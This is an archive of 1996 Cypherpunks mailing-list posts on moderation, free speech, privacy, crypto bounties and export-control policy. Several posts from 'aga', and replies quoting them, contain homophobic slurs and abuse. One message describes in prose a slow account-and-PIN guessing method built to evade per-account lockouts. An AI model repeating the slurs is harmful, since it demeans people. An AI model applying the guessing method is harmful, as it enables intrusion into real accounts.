>     Drop messages from queue if it gets "reordered" too many times.
> 

nononononononono Bad Bad Thing.  If you start doing that, we'll start
getting replies before messages _even more than we do now_.

> 4.  Truncating long messages.
> 

You _must_ be joking...

> 5.  Re-order out-going mail (from toad.com) according to time of
>     last mail (from the originator).  Basically, limit the rate of
>     mail from any particular person or host or domain.
> 

This hinders many discussions; easier and more effecient not to.

> 6.  Refuse connections from "known host(s) or domain(s) of
>     abusers" during "busy" periods.

Which would only really be usefull on users who needed to be removed
anyway.  A Better fix might be to and more disk space to queue messages
in.

> 
> These are not whole-sale censorship mechanisms, but just abuse-
> resistence measures.
> 

"Abuse-resistance" is simple: If somebody abuses the list, warn them.  If
they continue, John does what he did to Vulis. Good Thing. 'nuff said.

> Ern

 --Deviant
Blood flows down one leg and up the other.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 19 Nov 1996 02:48:21 -0800 (PST)
To: iang@systemics.com (Ian Grigg)
Subject: Re: Crypto Bounties: Another Thought that crossed my mind.
In-Reply-To: <3290992F.2781E494@systemics.com>
Message-ID: <199611191105.FAA00216@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> snow@smoke.suba.com said:
> >       Well, I was thinking, what if a "Crypto Software Bounty Server"
> >  were set up, so that someone could propose a tool that they would like
> >  to see, along with an initial bounty. Others could contribute toward that
> >  bounty (anonymously if they wish) until either the tool was delivered.
> >       The original issuer sets standards for the software (i.e. "easy to
> >  use interface to mixmaster remailers for Macintosh", then must define
> >  easy to use; Software considered delivered when in [alpha beta late-beta
> >  &etc.]). The first to present software meeting these qualifications gets
> >  the bounty, with the caviate that the software must be either gnu-copylefted,
> >  or some similar "free use" copyright, after all, "The Net" paid for it...
> Hmmm.  This is a one shot game (is that the term?) whereas software

     Correct term, but not necessarily accurate. 

> generally has implications that escape a single sale scenario.  For
> example, the more difficult the software, the more risk there is that
> someone else will beat you, thus lowering the real risk-adjusted payoff
> dramatically.   For this reason, more complex stuff would need some sort
> of contract+reputation scenario that allows a repeating game to work.

     Not necessarily. It could be set up to keep the Bounty open, to provide
a revenue stream for upgrades, or second, third & etc. bounties for upgrades
bug fixes and new features. 

> A contractual alternative could work like this.  I (the initial desirer)
> write a contract specifying my requirements.  I publish this as a market
> tender, where other desirers can contribute funds, and this becomes a

     <snip>

> eliminates the need for judges.  History shows that a good market
> microstructure will beat an authority approach in the long run.

     Reputation could also eleminate the need for judges. If Matt Blaze, 
or Randall S. were to try to claim a specific bounty, people would be 
more likely to accept their claim than if I were to do so. 

> Also note that if you drop the free software assumption, and make it,
> say, moneyware, then the market becomes much more workable - the asset
> being traded is a share of future revenues.  This has more ramifications
> than might be obvious:  Propose a market to write a GAK killer for
> e$10,000.  If it clears and is built, is the Dept. of Justice forced to
> buy the rights out?

    If it is GNU'd, then there is no one to buy out. I like the idea of 
"free" software. As it stands now, there is a lot of very high quality 
software free software out there (hell, all of the software I use _daily_
is "free" software), and if no one owns it, the government can't use 
copyright laws to restrict it. The feds _can't_ buy it out for a million 
dollars. 

     The other thing about the "bounty server" is that it is simpler to
set up (at least as far as I can see) than your contract model. 

     All you would need is to settle up the details, set up a web server
with the ability to handle ecash, and some sort of accounting and you are
off. Maybe, just to prove you are legit, a performance bond. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 19 Nov 1996 02:08:14 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: Does John Gilmore...
In-Reply-To: <199611182130.NAA08518@kachina.jetcafe.org>
Message-ID: <Pine.SUN.3.94.961119050314.6815B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996, Dave Hayes wrote:

> Date: Mon, 18 Nov 1996 13:30:51 -0800
> From: Dave Hayes <dave@kachina.jetcafe.org>
> To: freedom-knights@jetcafe.org
> Cc: cypherpunks@toad.com
> Subject: Re: Does John Gilmore... 
> 
> Black Unicorn writes:
> > Dave Hayes writesL:
> > > [For those who's assumptions rule their perception: I am *not* arguing
> > > that all speech should be subsidized. I am merely pointing out that
> > > the organization that is spending the money to broadcast is
> > > controlling the speech, hence it is *not* free speech in terms of
> > > freedom or cost.]
> > Again, you confuse free speech with free broadcast.
> 
> Isn't broadcast a subset of speech, especially in this culture?

That which is broadcast is certainly speech.

Trying to draw some kind of "right to be broadcast" as a result is
stupidity or ignorance, or both.

Anyone has the right to, e.g., start a mailing list, or a newsletter.
No one has the right to compell ABC or FOX or John Gilmore or anyone
else to broadcast their speech.  (The rarest exceptions, like equal time
rules, exist in election contexts).

Learn the difference.  Go to law school before you argue free speech
concepts in any detail.  Most importantly, spend more time thinking, less
talking or typing.

> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
> The penalty for laughing in a courtroom is six months in jail; if it were 
> not for this penalty, the jury would never hear the evidence.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 19 Nov 1996 02:12:45 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: NO commo to "Faggot" cypherpunk list
In-Reply-To: <Pine.LNX.3.95.961118131031.6951B-100000@dhp.com>
Message-ID: <Pine.SUN.3.94.961119050930.6815C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996, aga wrote:

> As I said dude; I no longer respond to any como with the cypherpunks
> address in the header.  If you want an answer to your comments,
> address your reply to the Freedom-knights list or to me, without
> any *punks address in the header.
> 
> Any list run by an admitted Faggot is no place where I
> will allow an audience.

Oh, this guy is for free speech.  Sure.

Freedom Knights?  Try Knights of the KKK.

> 
> -aga
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Tue, 19 Nov 1996 02:32:49 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: BAD FAGGOT John Gilmore
In-Reply-To: <Pine.SUN.3.94.961119050930.6815C-100000@polaris>
Message-ID: <Pine.LNX.3.95.961119052314.18903A-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996, Black Unicorn wrote:

> Date: Tue, 19 Nov 1996 05:11:23 -0500 (EST)
> From: Black Unicorn <unicorn@schloss.li>
> Reply-To: freedom-knights@jetcafe.org
> To: aga <aga@dhp.com>
> Cc: paul@fatmans.demon.co.uk, freedom-knights@jetcafe.org,
>     cypherpunks@toad.com
> Subject: Re: NO commo to "Faggot" cypherpunk list
> 
> On Mon, 18 Nov 1996, aga wrote:
> 
> > As I said dude; I no longer respond to any como with the cypherpunks
> > address in the header.  If you want an answer to your comments,
> > address your reply to the Freedom-knights list or to me, without
> > any *punks address in the header.
> > 
> > Any list run by an admitted Faggot is no place where I
> > will allow an audience.
> 
> Oh, this guy is for free speech.  Sure.
> 

Hey motherfucker, I TOLD YOU to leave out the stupid
cypherpunks header!  Just when are you going to learn
to listen?!!  You have been around those faggots too much!

Faggots have NOTHING to do with Fredom of Speech!

> Freedom Knights?  Try Knights of the KKK.
> 

Hey cocksucker, the KKK have nothing to do with faggots!

There is a basic understanding in life by ALL GOOD MEN
that Faggots are defective creatures.  NOBODY wants to
be seen with or associated with faggots!

John Gilmore is a Faggot, therefore he is defective.
And we question any of his associates.
open and shut case.

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <amp@pobox.com>
Date: Tue, 19 Nov 1996 02:37:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Extreme Left/Right
Message-ID: <01IC0OZLG0FI9FMAF8@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Nov 19 04:35:41 1996

=snip=
>I first saw mention of a chart similar to this in the 60s. It was a way of 
>describing beliefs politically that was put forth by Jerry Pournelle. (Who 
>is available on the net btw.)  

ao> That must be one hell of a download...  ]:>

I must be getting a bit dense. It took me a while for your comment to
sink in...

>Take a gander at the libertarian's chart. I think it is a more accurqte way 
>of describing people, and in fact is similar in some ways to what you 
>describe. A philosophy is charted based on how one views personal and 
>property rights.

ao> This assumes that there are only two basic axises that rights are
ao> based opon.  Some of those can get pretty fuzzy.  To properly
ao> describe how the system works would require an n-dimensional
ao> hyperpolygon of indeterminate size.  (Kind of like describing the
ao> black budget.  You know it is there, but looking at it is difficult,
ao> and if they catch you looking the hounds of tindalos will be coming
ao> at you out of every corner of the woodwork.)

Agreed. The problem is, how complicated do you want it to be? If we
are going to be classifying people by their political philosophy, the
sustem we use should at least be usable. An n-dimensional model would
probably be a highly accurate representation if properly constructed,
but who would sit through the grilling it requires? (perhaps someone
might be willing to =force= you to be grilled, but it wouldn't be
pleasant imo.)

A third axis would probably pinpoint things a bit better than a
2-dimensional model, but I must admit, I'm at a loss as to exactly
what this third line would be. I think 'personal' and 'economic'
liberty are a pretty good barometer of someone's thinking. It's not,
by any means, perfect, but it is easily understandable even by most
people today.

amp

ao> Personally, I am a political non-euclidean.

Indeed. Thank God the universe is non-euclidean and non-newtonian as well.


===
amp@pobox.com
Earth First! We'll strip mine the other planets later!
===
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpGNflUbR1RWr40pAQEtyAf8DdM8I8wKHftp+wnm6McMPbCRWada8NNC
cfvVMMmcowCEXbzXRli/+BU30YUan3Qr/Uf3nvqsT+yasfHJPEJIaIaUy7J+NC6w
IX+FQqpuDi3Hrh2B805qeq6erc0KWEkJkxZuV1WU1Akt+qk7DWPdVbwSmBF6Ae3z
1K8KxH1Z53NZ8HtWAfPzD6OV+cvCo66a+JwFxrEt02IGoZ6L53p9oQeDY81siGtl
xGmA+1xJ0cZtnqnUY6CuhG6As4iqr254ZdVSnszaI/lPrJCKG/w1aj9+5/UDoU1J
VcJfrTsdYaWDyuhxqeIkPbRNkFNr47KVnnPw7Ebemqmz2RjVdo18xQ==
=AlLl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Nov 1996 03:30:59 -0800 (PST)
To: Black Unicorn <sandfort@crl.com>
Subject: Re: The Utility of Privacy
Message-ID: <3.0b36.32.19961118232424.00b845f8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:54 PM 11/18/96 -0500, Black Unicorn wrote:
>> Not long ago, a college education was essentially a death warrant 
>> in Cambodia.  Prior to that, a degree was considered a good thing
>> there.  People saw no reason to hid the fact that they had been
>> in school.  Trouble is, things changed.
>
>Oh, come on.  That could never happen here.

Where have I heard that line before?  Sandy was giving an actual example of
a general problem.  Educated people were executed in Cambodia.  That may
not happen here but it is very common for innocent legal activities or
characteristics to later become very illegal and subject to punishment.

Examples:

Judaism in Germany in 1900 vs 1940
Smoking in America in 1950 vs 1996
Spanking children in Sweden 1950 vs 1996
Owning gold in America in 1930 vs 1933
Publishing and distributing "Discovery of the Orgone" in the 1940s vs the
1950s 

The problem is that you can't always guess in advance which of your
behaviors or characteristics will get you in trouble later.  

The fewer people who know your affairs the less trouble you will be in when
things change.

DCF

"When I was born, smoking was a virtue and sodomy a vice."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 19 Nov 1996 04:56:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cpunks Frog Forwards discontinuation
In-Reply-To: <Pine.SUN.3.91.961118175548.23329A-100000@beast.brainlink.com>
Message-ID: <0N4mXD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:
>
> This has been moved to sunder@sundernet.com (hosted via brainlink, the
> fascist dorsai account is no more.)

The search engines show ray@earthweb.com, sunder@brainlink.com,
arachel@poly.edu, ray.arachelian@f204.n2603.z1.fido.org, sunder@escape.com,
sunder@dorsai.org, 103070.2610@compuserve.com, sunder@sundernet.com - wow.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Tue, 19 Nov 1996 04:08:16 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: NO commo to "Faggot" cypherpunk list
In-Reply-To: <199611191448.MAA13513@prometheus.hol.gr>
Message-ID: <3291A407.2E94@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


George A. Stathis wrote:
> 
> Black Unicorn wrote:
>
>>> Any list run by an admitted Faggot is no place 
>>> where I will allow an audience.

  That certainly is your right alough I'd personally
differ.

>>
>>Oh, this guy is for free speech.  Sure.

  I saw nothing to the contrary--did you?


>>Freedom Knights?  Try Knights of the KKK.

  Oh my.
 
> I think you ought to realize by now, Mr. "Black Unicorn", that
> aga (like everyone of us) has a right to his own likes and dislikes.
> They may alienate some people, offend others, but I sincerily believe
> that equating his "dislike of faggots" to the "KKK" is seriously
> misleading.
> 

  One of Dr. Grubor's cosmic purposes in life is to bring
the vermin out of the woodwork--we have yet another.

                          Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 19 Nov 1996 07:50:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Irono-troll (was: Re: The Utility of Privacy)
Message-ID: <199611191550.HAA26611@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 PM 11/18/96 -0600, Roy M. Silvernail wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>A troll using nobody@huge.cajones.com writes in reply to Sandy Sanfort a
>lot of dismissal of past tragedies resulting from privacy violations.
>Hir consistent viewpoint seems to be that protecting ones privacy has no
>value.  Then sie has the temerity to ask
>
>> BTW, are you operating under your True Name?
>
>My ironometer is absolutely pegged.

Mine did too.  It is the most amusing exchange I've seen in a long while. 
An extremely stable nym arguing for privacy against an anonymous remailer
arguing that it isn't important.  It makes up for all the trash talk and
references to sexual orientation that the juveniles have been posting.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Tue, 19 Nov 1996 08:56:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rogue Governments Issuing Policy Tokens
Message-ID: <199611191649.IAA00949@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Timothy C. May" <tcmay@got.net>
> The problem (for GAK) of "rogue governments" is this: a government such as
> Libya or Panama, henceforth to be known as "Rogueitania," issues policy
> cards to all of its citizens, and to all those visiting Rogueitania, and
> perhaps through the mail to anyone who pays some fee.

I don't think this would happen.  Some kind of secret information or
hardware is going to be needed to create policy tokens.  (Otherwise
anybody could make one.)  That means that HP, and therefore ultimately
the U.S. government, is going to have to approve those governments which
are allowed to issue such tokens.  HP will have to provide them some
special hardware or something to make them.  The tokens will only be
accepted if they have proper secrets inside them.

I can't see the U.S. allowing Libya and similar countries to create policy
tokens.  The whole point of this exercise is to prevent these countries
from being able to use strong crypto.  So they will certainly not be on
the approved list.

Does this represent an attempt to establish a de facto U.S. hegemony over
the world, where the U.S. government gets to decide which other governments
have access to crypto?  Not necessarily; other countries will still have
the option to use computers made outside the U.S.  The fact of international
competition will still exist.

If the HP initiative does become a widespread standard (which I think is
unlikely at this point) then we will see the same sorts of flight towards
non U.S. computers that we now see towards non U.S. crypto companies.
Why should an Israeli company buy an American computer with a policy chip
that is ultimately under the control of the U.S. government when they
can get one locally made which has no such restrictions?

And of course all this focus on hardware tokens ignores the fact that
the alternative of software-only crypto will still be present, both for
the domestic market and for the international market where the products
don't come from the U.S.  This will represent additional competition
which the HP proposal must face.

For these reasons I don't think the HP idea solves the export problem
for U.S. hardware and software makers.  And the response by opinion leaders
has ranged from ho-hum to negative, despite the self-serving cheerleading
by HP management.  Companies which try to sell computers with these chips
in them risk getting a "big brother inside" (to use Tim's very effective
slogan) reputation.  I think this initiative is going nowhere.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Nov 1996 05:52:24 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: Securing Electronic Mail Within HMG
Message-ID: <1.5.4.32.19961119134957.006a19d4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Ben Laurie wrote:

>This document is available on the Web, at:
>
>http://www.xopen.org/public/tech/security/pki/casm/casm.htm
>
>see also my "addendum" to Anderson & Roe's paper (which is actually a critique
>of the above proposal, rather than RH itself) at:
>
>http://www.algroup.co.uk/crypto/rh.html


Ben rightly points to a complete and handsome forebear of our 
gap-toothed descendant. We withdraw ours.

Thanks Ben. And thanks for your "addendum" to A&R.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <clay.olbon@dynetics.com>
Date: Tue, 19 Nov 1996 06:09:48 -0800 (PST)
To: "George A. Stathis" <cypherpunks@toad.com
Subject: Re: REQUESTING INFORMATION :-)
Message-ID: <1.5.4.32.19961119140742.006b7604@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:53 AM 11/19/96 -0200, George A. Stathis wrote (in part):

>I REQUEST INFORMATION on those people who compile "Unemployability
>Lists" in the USA, as well as ANY other information on this issue.

You can add me to your list.  I keep an "unemployability list" - although I
don't write it down or put it on a computer.  

>We Greeks would like ALL the names of the people who act as "Informers"
>of companies denouncing those unfortunate Americans who are doomed
>to unemployment. We plan to give these names to all our friends, so
>as to warn them WHO to avoid during our summer holidays in Greek
>Islands.

Why don't you come back to reality.  I have hired and fired people.  Those
that I fired I would not hire again.  There are others I have worked with
that I would never hire (and would strongly recommend against anyone else
hiring).  That is life.  I have little sympathy for the "unfortunate" people
that I may hurt by not recommending their employment.  Generally it is
because they are lazy, stupid, or dishonest.  This is a judgement call on my
part, and others are free to take or discard my recommendations based on my
reputation.  

Here is my recommendation for you.  Take my "unemployables" list.  Hire
everyone on it.  Try to run a business without going broke.

Hiring people based on reputation is a system that works.  I'm sorry if this
impinges on your sensibilities.  Reality has a tendency to do that though.  

        Clay

*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 19 Nov 1996 06:45:35 -0800 (PST)
To: shamrock@netcom.com>
Subject: Nit: "Gronked "
In-Reply-To: <199611190631.WAA25180@netcom6.netcom.com>
Message-ID: <v03007806aeb76df8dba7@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:34 am -0500 11/19/96, Bill Frantz wrote:
>* gronk v.t. To hit over the head with a club.  From Johnny Hart's
>cartoon, B.C.

Nit: Gronk is actually the noise the dinosaur makes. If you will, saurian
ejaculata (the verbal kind, you pervert!). Thus, to be "gronked" could be
considered be to suffer the indignities of dinosaur breath. :-).

Something the people on this list, who are, er, on the cutting edge of
societal evolution, have no small experience with, as our latest experience
with Hewlett Packard shows...

;-).

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Tue, 19 Nov 1996 01:12:15 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=cypherpunks+40toad+2Ecom+3B@chemson.com>
Subject: FW: Unsubtroll
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961119091559Z-4660@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain




FOR GOD'S SAKE !!!!!!!!!!!!!!!!!!

>----------
>From: 	piotrk@opnt.optimus.wroc.pl[SMTP:piotrk@opnt.optimus.wroc.pl]
>Sent: 	19 November 1996 05:04
>Subject: 	Unsubtroll
>
>>unsubtroll
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Tue, 19 Nov 1996 06:26:27 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Fuck You Dumb Cunt
In-Reply-To: <199611182134.NAA08552@kachina.jetcafe.org>
Message-ID: <3291C46F.142A@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> Stephen Boursy wrote:
>>
>> Dave Hayes wrote:
> 
>> > I believe in them, alright. It's just that they seem to be at odds
>> > with freedom of speech.
>> > They are at odds with a lot of other things as well, but that's
>> > a different fla...er...discussion.
> 
>>   I believe the posession of property is a priv. to be taken
>> away if abused.  There is no such thing as a 'right' to
>> property--in fact the very notion seems absurd.
> 
> You've just lumped all possessions into a single category.  There's a
> valid argument against private ownership of land when ownership of that
> land can be (and usually is) moved from the people at large to just a
> few people, then eventually to dictators, etc.


  Well--if you look at the ownership of wealth in the US including
but not limited to real estate you'll find much the same.  And that
ownership is not, to my mind, in the least legitimate.

 
> But are you suggesting that if I trade my labor for some material item
> which was built with other people's labor, and that material item is
> sufficiently portable that it doesn't have to occupy a significant
> piece of real estate (i.e., a house, a large boat), *they* should be
> able to take that material item away from me anyway on whatever pretext,
> on the basis that possession of it is a *privilege*?  Is my paycheck,
> given to me directly for my labor just a privilege?


  That's a fair question.  I don't begrude one's ownership of their
fair share--but I do have serious problems with what we shall
call 'accumulators' if you will.  For them I have contempt and no--
they do not have that right of possession and often such 'work' is
at the expense and on the backs of others.

                               Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 19 Nov 1996 09:36:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: BAD FAGGOT John Gilmore
In-Reply-To: <Pine.LNX.3.95.961119052314.18903A-100000@dhp.com>
Message-ID: <199611191730.JAA19686@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: aga <aga@dhp.com>
> 
> Hey motherfucker, I TOLD YOU to leave out the stupid
> cypherpunks header!  Just when are you going to learn
> to listen?!!  You have been around those faggots too much!
> 
> Faggots have NOTHING to do with Fredom of Speech!
> 
> > Freedom Knights?  Try Knights of the KKK.
> > 
> 
> Hey cocksucker, the KKK have nothing to do with faggots!

Really, then how come you keep posting your messages through
cypherpunks, a list over which an alleged "Faggot" has complete
control?  You keep telling others not to post to the list, but you
keep posting there yourself.  Could it be that you have no authority
yourself, and thus can't even keep your own E-mail away from the
control of "Faggots"?

> There is a basic understanding in life by ALL GOOD MEN
> that Faggots are defective creatures.  NOBODY wants to
> be seen with or associated with faggots!

I guess there aren't very many good men left, and the few who are left
don't have any authority themselves--They are forced to use mailing
lists under the authority of "Faggots."  I guess you loose and the
"Faggots" win.  Game over, now shut up.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Tue, 19 Nov 1996 09:32:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taking out the garbage
Message-ID: <199611191733.JAA19742@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




I'd like to point out that accepting posts from those who are not
technically subscribed to the list is not always a bad idea.  In particular,
many of us read the list through means other than a direct subscription,
be it either a mail-to-news gateway, web server, filtered list, or other
such mechanism.

As a case in point, while I do read the list, my actual email address is not
subscribed to it. :)

While I usually don't contribute to the discussion, I hope that the few
posts I have made from time to time don't fall into the pollution category.
Furthermore, it's often the case that noted cryptographers who are not
subscribed to the list occasionally post valuable contributions to it (e.g.
Matt Blaze).

Non-subscription and pollution are not necessarily related.

Dana W. Albrecht
dwa@corsair.com


Lucky Green <shamrock@netcom.com> writes:  
> Beginning Monday, 11/25/96, I will bounce all email from the various 
> (non-)subscribers polluting this list with garbage back to the 
> authors. Furthermore, I will attach documents describing basic 
> Internet rules of conduct to each bounce.
> 
> I would encourage other Cypherpunks to do the same. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 19 Nov 1996 06:46:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Reputation distortions?
In-Reply-To: <3290992F.2781E494@systemics.com>
Message-ID: <v0300780faeb77279ea48@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 am -0500 11/19/96, snow wrote:
>     Reputation could also eleminate the need for judges. If Matt Blaze,
>or Randall S. were to try to claim a specific bounty, people would be
>more likely to accept their claim than if I were to do so.

But, what about reputation distortions?

There's the famous story about a guy presenting his discovery of the normal
distribution to a scientific society. Gauss was in the audience. He stood
up and said something like, "Oh. I figured that out years ago."

We now call it a "Gaussian" distribution, among other things.

If I remember the story correctly, Gauss never subsequently proved that he
discovered the normal distribution first, and he certainly never published
it at the time he said he discovered it.

Nobody remembers the name of the guy who was presenting the paper, though.
At least, I can't now. :-).

I'm not saying that Gauss *didn't* discover the normal distribution. I'm
saying that he didn't have to *prove* he did. Of course not. He was the
greatest mathematician of his time, and probably since.

I'd call the event a reputation distortion.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trei@process.com
Date: Tue, 19 Nov 1996 06:40:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] U.S. CIA employee caught spying
Message-ID: <199611191440.GAA14684@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 Tim Scanlon <tfs@adsl-122.cais.com> writes:
> This is on the local DC news;
> Harold Nicholson age 46, a CIA employee was arrested for spying today
> at Dulles airport. He allegedly has been working for the Russians
> for the past 2 years. 
> He was caught after he failed a series of polys, and bank account 
> irregularities had been noticed, as well as suspcious travel.
> They got him on hidden video apperently photocopying documents
> that he intended to pass along.
> Tim

If he's found guilty, I hope that they throw the book at the traitor. He
apparently  was a trainer of agents, and as such was in a positiona to 
identify many to the Russians. I wonder how many died so he could 
earn his $140,000? 

Peter Trei
trei@porcess.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 19 Nov 1996 12:24:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: pgp bugs list?
Message-ID: <199611190950.JAA00412@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



I seem to remember someone saying that pgp's +makerandom function was
broken.  However I'm unable to find any confirmation of this with a
web search.

I'm sure there used to be a known pgp bugs list held at MIT?  I can't
find it now.  Anyone know of the bugs lists whereabouts, or could
confirm/refute any security problems with +makerandom?

(premail uses it, pgp stealth could use it, if it worked).

[the (undocumented) feature is this:

	pgp +makerandom=1024 out

creates 1024 bytes of what should be good random nos, in file "out"]

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nicolas J. Hammond" <njhm@ns.njh.com>
Date: Tue, 19 Nov 1996 06:47:28 -0800 (PST)
To: mixmaster@remail.obscura.com (Mixmaster)
Subject: Re: accutrade
In-Reply-To: <199611182120.NAA10915@sirius.infonex.com>
Message-ID: <199611191451.JAA26479@ns.njh.com>
MIME-Version: 1.0
Content-Type: text/plain


Mixmaster wrote ...
> Hacking the 9 digit account number and 4 digit PIN will be easier than attacking the OS directly.
> Either method though would certainly ring loud bells at Accutrade unless they are infected with 
> headinbutt disease.

No.

If, and this is a big if, the account numbers are issued sequentially,
and I know a starting account number (A), then I try account A+1
with the PIN "1234". If it fails then 1 minutes later I try A+2
also with the PIN "1234" and so on. I'm trying 60 accounts/hour, 1440/day.
It shouldn't trip up errors because most programmers only put error 
counters on each account and we only try each account once.

By laws of probability 1 account in 10000 should have the PIN "1234"
(reality will be different, people choose easy to remember PINs).

Within 4 days I've tried over 5000 accounts and statistically have
a greater than 50% chance that I've got an account number and PIN.

-- 
Nicolas Hammond                                 NJH Security Consulting, Inc.
njh@njh.com                                     211 East Wesley Road
404 262 1633                                    Atlanta
404 812 1984 (Fax)                              GA 30305-3774




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Todd <dtodd@corp.usweb.com>
